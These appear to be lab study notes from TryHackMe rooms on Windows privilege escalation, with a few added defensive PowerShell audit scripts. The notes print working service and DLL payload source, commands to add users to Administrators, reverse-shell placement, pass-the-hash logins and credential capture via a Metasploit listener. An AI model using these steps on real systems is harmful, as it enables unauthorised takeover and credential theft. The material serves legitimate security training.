TryHackMe | Windows Privilege Escalation

In this post, I summarize lessons learned from two rooms covering Windows Privilege Escalation on TryHackMe.
In: TryHackMe, Attack


These are just some of the things you can try to escalate privileges on a Windows system. This is not meant to be an exhaustive list; it only scratches the surface of Windows privilege escalation.

Be flexible and diligent in your checks. Most of these are just examples, and you don't have to follow them word-for-word: check other services, other files and other registry keys, using these as a starting point.



Method 1: Registry

  • Check for autorun programs
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  • If there are any autorun programs, you may be able to overwrite the binary
  • Use accesschk.exe or icacls to check your permissions on that program's directory
    • accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program"
    • If any of the files are writable, you can overwrite one with a reverse shell payload
    • When an administrative user logs on, the payload runs and we get an elevated shell
    • A listener needs to be running continuously to catch logons


  • Check whether the AlwaysInstallElevated setting has been enabled
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
  • If either of those queries returns 1, you can get an elevated shell
  • Use msfvenom to create an .msi payload and run it on the target
    • Start a listener
    • Run this command to install the malicious package
msiexec /quiet /qn /i <path to msi>
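As an added example (not code from the TryHackMe rooms or this post), a PowerShell check that reports the two registry conditions above from the defender's side: it reads AlwaysInstallElevated in both hives and checks whether any Run-key binary is writable by low-privilege principals. The identity patterns and the Run keys queried are assumptions.

```powershell
# Added audit example; not code from the TryHackMe rooms. Run on the host being reviewed.
# Assumption: these identity patterns are what we treat as "low-privilege" principals.
$LowPriv = 'Everyone|Authenticated Users|BUILTIN\\Users|INTERACTIVE'

# 1. AlwaysInstallElevated. Windows Installer honours it only when BOTH the HKLM and HKCU
#    values are 1, so each hive is reported and the fully enabled case is flagged separately.
$hives = 'HKLM:\Software\Policies\Microsoft\Windows\Installer',
         'HKCU:\Software\Policies\Microsoft\Windows\Installer'
$enabled = @()
foreach ($h in $hives) {
    $v = (Get-ItemProperty -Path $h -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    if ($v -eq 1) { Write-Warning "$h AlwaysInstallElevated = 1"; $enabled += $h }
    else          { "$h AlwaysInstallElevated = $(if ($null -eq $v) { 'not set' } else { $v })" }
}
if ($enabled.Count -eq 2) { Write-Warning 'Enabled in both hives: Windows Installer will run any MSI as SYSTEM for any user' }

# 2. Run keys: pull the executable out of each autorun command line and check its ACL.
#    A binary writable by a low-privilege principal runs whatever is put there at the
#    next logon of any user, including an administrator.
$runKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
foreach ($key in $runKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in ($props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
        $cmd = [string]$p.Value
        # quoted command line -> the quoted part; unquoted -> everything up to the first ".exe"
        $exe = if ($cmd -match '^"([^"]+)"') { $Matches[1] }
               elseif ($cmd -match '^(.+?\.exe)') { $Matches[1] } else { $cmd }
        $exe = [Environment]::ExpandEnvironmentVariables($exe)
        if (-not (Test-Path -LiteralPath $exe)) { "$($p.Name): $exe does not exist (check the parent directory ACL)"; continue }
        $weak = (Get-Acl -LiteralPath $exe).Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and $_.IdentityReference -match $LowPriv -and
            $_.FileSystemRights.ToString() -match 'Write|Modify|FullControl'
        }
        if ($weak) { Write-Warning "$($p.Name): $exe is writable by $(($weak.IdentityReference.Value | Select-Object -Unique) -join ', ')" }
        else       { "$($p.Name): $exe OK" }
    }
}
```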



  • Open PowerShell and check your permissions on this registry key
Get-Acl hklm:\System\CurrentControlSet\services\regsvc
  • If your user account, or a group you're a member of, can register services, then you can create a malicious service to perform a privileged task
  • Create a dummy Windows service
    • An example service is shown below
      • Modify the source code here
      • Enter the command in system()
    • Use the command cmd.exe /k net localgroup administrators user /add
    • This will add the current user to the local Administrators group
  • In Kali, compile the .c code to a .exe
x86_64-w64-mingw32-gcc windows_service.c -o privesc.exe
  • Transfer privesc.exe to a writable folder on the target
  • Point the service at the binary
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d <C:\Path\to\privesc.exe> /f
  • Start the service
sc.exe start regsvc
  • Confirm the current user has been added to the local Administrators group


#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* system() */

#define SLEEP_TIME 5000

SERVICE_STATUS        ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;   /* handle returned by RegisterServiceCtrlHandler */
void ServiceMain(int argc, char** argv);
void ControlHandler(DWORD request);

//add the payload here
int Run()
{
    system("cmd.exe /k net localgroup administrators user /add");
    return 0;
}

int main()
{
    SERVICE_TABLE_ENTRY ServiceTable[2];
    ServiceTable[0].lpServiceName = "MyService";
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;
    ServiceTable[1].lpServiceName = NULL;   /* NULL entry terminates the table */
    ServiceTable[1].lpServiceProc = NULL;

    /* hand the process to the SCM; it calls ServiceMain when the service is started */
    StartServiceCtrlDispatcher(ServiceTable);
    return 0;
}

void ServiceMain(int argc, char** argv)
{
    ServiceStatus.dwServiceType             = SERVICE_WIN32;
    ServiceStatus.dwCurrentState            = SERVICE_START_PENDING;
    ServiceStatus.dwControlsAccepted        = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
    ServiceStatus.dwWin32ExitCode           = 0;
    ServiceStatus.dwServiceSpecificExitCode = 0;
    ServiceStatus.dwCheckPoint              = 0;
    ServiceStatus.dwWaitHint                = 0;
    hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler);

    /* the payload runs once, as the account the service is configured to use */
    Run();
    ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    SetServiceStatus(hStatus, &ServiceStatus);

    /* idle until the control handler moves the service out of SERVICE_RUNNING */
    while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
    {
        Sleep(SLEEP_TIME);
    }
    return;
}

void ControlHandler(DWORD request)
{
    switch (request)
    {
        case SERVICE_CONTROL_STOP:
            ServiceStatus.dwWin32ExitCode = 0;
            ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
            SetServiceStatus(hStatus, &ServiceStatus);
            return;
        case SERVICE_CONTROL_SHUTDOWN:
            ServiceStatus.dwWin32ExitCode = 0;
            ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
            SetServiceStatus(hStatus, &ServiceStatus);
            return;
        default:
            break;
    }
    SetServiceStatus(hStatus, &ServiceStatus);
    return;
}

File Permissions Service

  • You can follow this process on other services as well
    • The File Permissions Service is just used here as an example
  • Check the configuration of filepermsvc
sc.exe qc filepermsvc
  • Note that it runs as SYSTEM
  • See if you or a group you're in can modify the service binary
accesschk64.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"
  • For example, if Everyone has FILE_ALL_ACCESS, you can overwrite the service binary, so when the service starts, the malicious binary is run
  • Use the windows_service.c service from before
    • Or a reverse shell payload to spawn a SYSTEM shell
    • Copy privesc.exe over C:\Program Files\File Permissions Service\filepermservice.exe
  • Run this command to restart the service
sc.exe stop filepermsvc && sc.exe start filepermsvc
  • The current user should now have been added to the local Administrators group

DLL Hijacking

  • In this example, a service loads a DLL from a directory where we have write permissions
    • We can determine this by running procmon on the target
    • Or by running the executable copied from the target on a test machine
  • We can create a malicious DLL that will be loaded by the service instead
    • Compile the C code to a DLL on Kali:
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijacked.dll
  • Copy the DLL to the target path
  • Start the service
sc.exe start <service>

Example DLL Code

// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
#include <windows.h>
#include <stdlib.h>   /* system() */
BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    /* DLL_PROCESS_ATTACH fires when the service loads the DLL; the payload runs then */
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k net localgroup administrators user /add");
    }
    return TRUE;
}

Insecure Service Permissions

  • Similar to the File Permissions Service attack before
  • Check a service's permissions to see if we can modify it
    • In this example, we're checking daclsvc, but other services should be checked as well
accesschk.exe /accepteula -uwcqv daclsvc
accesschk64.exe /accepteula -wuvc daclsvc
  • Query the service to see if it runs as SYSTEM
sc.exe qc daclsvc
  • If we have SERVICE_CHANGE_CONFIG, we can change the service's binary path to an arbitrary command
sc.exe config daclsvc binpath= "net localgroup administrators user /add"
sc.exe start daclsvc
  • This will add the current user to the local Administrators group when the service is started or restarted
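As an added example (not code from the TryHackMe rooms), a small parser for the SDDL string that sc.exe sdshow prints, reporting which services grant SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER or generic all/write to broad principals, so the condition accesschk reports above can be found across every service. The sample SDDL is constructed, and the table of "broad" principals is an assumption.

```powershell
# Added example, not code from the TryHackMe rooms: parse the SDDL that sc.exe sdshow prints
# and report broad principals holding rights that let them reconfigure the service.
# In the rights field DC = SERVICE_CHANGE_CONFIG, WD = WRITE_DAC, WO = WRITE_OWNER; note that
# "WD" in the SID field means Everyone instead, so the two tables below are kept separate.
$DangerousRights = @{ DC = 'SERVICE_CHANGE_CONFIG'; WD = 'WRITE_DAC'; WO = 'WRITE_OWNER'
                      GA = 'GENERIC_ALL'; GW = 'GENERIC_WRITE' }
# Assumption: these are the principals we treat as broad / low-privilege
$BroadSids = @{ WD = 'Everyone'; AU = 'Authenticated Users'; BU = 'BUILTIN\Users'; IU = 'INTERACTIVE'
                BG = 'BUILTIN\Guests'; 'S-1-1-0' = 'Everyone'; 'S-1-5-11' = 'Authenticated Users' }

function Find-WeakServiceAces([string]$Sddl) {
    # keep the DACL part "D:(ace)(ace)..." and drop an optional SACL ("S:...") that follows it
    if ($Sddl -notmatch 'D:(.*?)(?:S:.*)?$') { return }
    $dacl = $Matches[1]
    foreach ($m in [regex]::Matches($dacl, '\(([^)]*)\)')) {
        $f = $m.Groups[1].Value -split ';'      # type;flags;rights;object_guid;inherit_guid;sid
        if ($f.Count -lt 6 -or $f[0] -ne 'A') { continue }   # only Allow ACEs grant anything
        $rights = [regex]::Matches($f[2], '..') | ForEach-Object { $_.Value }   # two-letter codes
        $bad = @($rights | Where-Object { $DangerousRights.ContainsKey($_) })
        if ($bad.Count -gt 0 -and $BroadSids.ContainsKey($f[5])) {
            [pscustomobject]@{
                Principal = $BroadSids[$f[5]]
                Rights    = ($bad | ForEach-Object { $DangerousRights[$_] }) -join ','
            }
        }
    }
}

# Constructed sample in the shape sc.exe sdshow prints; the third ACE gives Authenticated Users (AU)
# DC, which is the condition the accesschk output above reports as SERVICE_CHANGE_CONFIG.
$sample = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPLORC;;;AU)' +
          'S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)'
Find-WeakServiceAces $sample | Format-Table

# Live sweep: every installed service, one warning per weak ACE
foreach ($svc in Get-Service) {
    $sddl = (& sc.exe sdshow $svc.Name 2>$null | Where-Object { $_ -match '^D:' }) -join ''
    Find-WeakServiceAces $sddl | ForEach-Object { Write-Warning "$($svc.Name): $($_.Principal) has $($_.Rights)" }
}
```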

Unquoted Service Path

  • Run sc.exe qc <service> to query a service
  • Especially useful if a service is running as NT Authority\SYSTEM
  • If a service's BINARY_PATH_NAME is not wrapped in quotes
    • Example: C:\Program Files\Service Directory\awesome.exe
    • We need to find out whether any part of that path is writable
    • If C:\ is writable, we can create a Program.exe payload
    • If C:\Program Files\ is writable, we can create a Service.exe payload
    • If C:\Program Files\Service Directory\ is writable, we can create an awesome.exe payload
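The checks from the File Permissions Service section and this one, written as a single added PowerShell audit (not code from the TryHackMe rooms): it enumerates services, reports any service binary writable by low-privilege principals, and for unquoted paths with spaces lists the intermediate file names the service controller would try and whether their parent directories are writable. The identity patterns for "low-privilege" principals are an assumption.

```powershell
# Added audit example; not code from the TryHackMe rooms. Run as the account you are assessing
# (or elevated, for complete ACL reads). Assumption: these are the "low-privilege" principals.
$LowPriv = 'Everyone|Authenticated Users|BUILTIN\\Users|INTERACTIVE'

# Low-privilege identities allowed to write to a file or directory (empty if none, or unreadable).
# Caveat: ACEs holding generic rights show as numbers, not names, and are not matched here.
function Get-LowPrivWriters([string]$Path) {
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and $_.IdentityReference -match $LowPriv -and
        $_.FileSystemRights.ToString() -match 'Write|Modify|FullControl|CreateFiles'
    } | ForEach-Object { $_.IdentityReference.Value } | Select-Object -Unique)
}

# For an unquoted path with spaces, every file name the service controller would try first:
# C:\Program Files\Service Directory\awesome.exe -> C:\Program.exe, C:\Program Files\Service.exe
function Get-UnquotedCandidates([string]$ExePath) {
    $parts = $ExePath -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) { ($parts[0..($i - 1)] -join ' ') + '.exe' }
}

Get-CimInstance Win32_Service | Where-Object { $_.PathName } | ForEach-Object {
    $svc = $_
    $raw = $svc.PathName.Trim()
    # quoted -> the quoted part; unquoted -> up to the first ".exe" (drops any arguments)
    $exe = if ($raw -match '^"([^"]+)"') { $Matches[1] }
           elseif ($raw -match '^(.+?\.exe)') { $Matches[1] } else { $raw }
    $issues = @()
    $w = Get-LowPrivWriters $exe
    if ($w) { $issues += "service binary writable by $($w -join ', ')" }
    if ($raw -notmatch '^"' -and $exe -match ' ') {
        foreach ($cand in Get-UnquotedCandidates $exe) {
            $dw = Get-LowPrivWriters (Split-Path -Path $cand -Parent)
            if ($dw) { $issues += "unquoted path: $cand could be created by $($dw -join ', ')" }
        }
    }
    if ($issues) { Write-Warning ("{0} (runs as {1}): {2}" -f $svc.Name, $svc.StartName, ($issues -join '; ')) }
}
```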

Startup Applications

  • In a lower privileged shell, run
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
  • If BUILTIN\Users has (F), we can add a payload there
  • Use msfvenom to generate a reverse shell exe payload
  • Put the payload in the folder
  • Start a listener
  • Wait for an admin to log in

Passing the Hash


  • If you have a user's hash
pth-winexe -U 'username%hash' //MACHINE_IP cmd.exe
  • This is just an example; I've written more notes here on passing the hash

Scheduled Tasks

  • Check for scheduled tasks running as privileged accounts
  • If the task is running a script, check the permissions on the script
accesschk.exe /accepteula -quvw user C:\path\to\script
  • May be able to overwrite or modify the script contents
  • Could run a command or reverse shell

Hot Potato


  • If the host is vulnerable to the Hot Potato privilege escalation, we will be able to impersonate the SYSTEM account and run commands as SYSTEM
  • Import the Invoke-Tater.ps1 script
  • Run it with the command to execute
Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
  • The current user should now be a member of the local Administrators group

Password Mining


  • Search the registry recursively for the word "password"
reg query HKLM /f password /t REG_SZ /s
  • This key is worth a quick check on its own
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
  • Spawn an admin shell from Kali with a recovered password
winexe -U 'username%password' //target-ip cmd.exe
  • This is just an example. I've written more notes here on passing the password.


  • Run cmdkey /list to list any saved credentials
  • Start a reverse shell as the user whose credentials are saved
runas /savecred /user:username C:\PrivEsc\reverse.exe


  • Check the <Password> property for a base64-encoded password

Internet Explorer Memory Dump

  • Start msfconsole and set up the capture module
use auxiliary/server/capture/http_basic
set uripath pwn
  • Victim
    • Open Internet Explorer
    • Go to http://kali-ip/pwn
    • Open Task Manager
    • Right-click iexplore.exe > Image Name > Create Dump File
    • Transfer the .DMP file to Kali
  • Kali
    • Check whether there are any saved credentials in the IE dump
strings file.DMP | grep "Authorization: Basic"
  • If so, decode the base64 string
echo -ne "base64string" | base64 -d

GUI Apps

Run as Admin

  • If a GUI app is set to run as admin at launch
    • Example: MS Paint
      • Launch Paint
        • File > Open
        • Enter file://C:/Windows/System32/cmd.exe

Kernel Exploits


  • Run exploit-suggesting scripts to detect kernel exploits, for example:
  • winPEASany.exe
  • Seatbelt.exe
  • PowerUp.ps1
  • SharpUp.exe
